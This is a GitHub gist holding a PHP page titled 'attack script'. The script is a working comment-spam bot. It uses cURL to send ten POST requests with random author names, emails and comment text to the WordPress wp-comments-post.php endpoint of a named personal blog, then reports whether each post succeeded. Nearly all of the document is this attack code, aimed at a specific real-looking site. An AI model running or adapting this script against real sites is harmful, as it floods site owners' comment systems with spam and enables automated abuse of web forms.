Created
May 1, 2014 21:54
-
-
Save anonymous/22457214c34564647eea to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html> | |
<head> | |
<title>attack script</title> | |
</head> | |
<body> | |
<?php | |
/* ------------ Functions needed for attack --------------------- */ | |
function rand_str($len) | |
{ | |
$str = ""; | |
while ($len-- > 0) | |
{ | |
$val = rand(0,1) ? rand(ord("A"),ord("Z")) : rand(ord("a"),ord("z")); | |
$str .= chr($val); | |
} | |
return $str; | |
} | |
/* ----------------- Misc. preprocessing -------------------- */ | |
date_default_timezone_set('America/Los_Angeles'); | |
/* ----------------- Initialize new cURL session -------------------- */ | |
$curl = curl_init(); | |
$page_url = "http://feucht.us/blog"; | |
$funct_url = "http://feucht.us/blog/wp-comments-post.php"; | |
curl_setopt($curl, CURLOPT_URL, $funct_url); | |
/* ---------------------- Begin attack ----------------------------- */ | |
echo("<h1>Comment spam run on <i>". $page_url . "</i> on " . date("d-m-Y h:i:s") . "</h1>"); | |
echo("<h3><b>RESULTS:</b></h3>"); | |
$num_coms = 10; /* # of comments to post */ | |
$wait_period = 1; /* # of seconds to wait between posting each comment */ | |
$name_length_bounds = array(5,20); /* min and max length of random name to be generated */ | |
$alias_length_bounds = array(8,15); /* min and max length of random email prefix to be generated */ | |
$email_length_bounds = array(3,10); /* min and max length of random email provider to be generated */ | |
$comment_length_bounds = array(5, 40); /* min and max length of random comment to be generated */ | |
while ($num_coms-- > 0) | |
{ | |
/* Pause between the posting of comments: */ | |
sleep($wait_period); | |
/* Initialize random names, email addresses and comments: */ | |
$rname = rand_str(rand($name_length_bounds[0], $name_length_bounds[1])); | |
$remail = rand_str(rand($alias_length_bounds[0], $alias_length_bounds[1])) . "@" . rand_str(rand($email_length_bounds[0], $email_length_bounds[1])) . ".com"; | |
$rcomment = rand_str(rand($comment_length_bounds[0], $comment_length_bounds[1])); | |
/* Create POST request string from random text and add to cURL object */ | |
$post_string = "author=" . $rname . "&email=" . $remail . "&comment=" . $rcomment; | |
curl_setopt($curl, CURLOPT_POSTFIELDS, $post_string); | |
/* Execute the request and print out whether it succeeded or failed. */ | |
echo(curl_exec($curl) ? "<hr><p><span style='color:green'>Successfully submitted</span>" : "<hr><p><span style='color:red'>Did not successfully submit</span>"); | |
echo(" POST request <b>" . $post_string . "</b></p><p>to</p><p><b>" . $funct_url . "</b></p>"); | |
} | |
?> | |
</body> | |
</html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment